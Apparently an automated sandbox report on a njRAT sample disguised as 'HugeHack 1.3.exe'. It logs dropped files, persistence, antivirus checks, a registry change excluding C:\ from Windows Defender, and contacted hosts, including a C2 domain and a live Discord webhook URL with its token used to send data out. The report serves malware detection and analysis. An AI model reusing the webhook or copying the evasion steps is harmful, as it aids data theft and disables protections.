Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7728 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

AV process strings found (often used to terminate AV products)

Binary or memory string: Wireshark.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
140.82.113.4	github.com	United States	36459	GITHUBUS	false
162.159.130.233	discordapp.com	United States	13335	CLOUDFLARENETUS	false
46.121.250.34	gabh.gotdns.ch	Israel	9116	GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
github.com	140.82.113.4	true
api.ipify.org	172.67.74.152	true
discordapp.com	162.159.130.233	true
gabh.gotdns.ch	46.121.250.34	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9	false		high
https://api.ipify.org/	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HugeHack 1.3.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\ClickMe.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Avira: detection malicious, Label: TR/Spy.Gen8

Found malware configuration

Source: 2.0.Payload.exe.890000.0.unpack

Multi AV Scanner detection for dropped file

Source: C:\ClickMe.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\dllhost.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: HugeHack 1.3.exe.bin.exe	Virustotal: Detection: 76%			Perma Link
Source: HugeHack 1.3.exe.bin.exe	ReversingLabs: Detection: 91%

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Uses 32bit PE files

Source: HugeHack 1.3.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49729 version: TLS 1.2

Source:

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

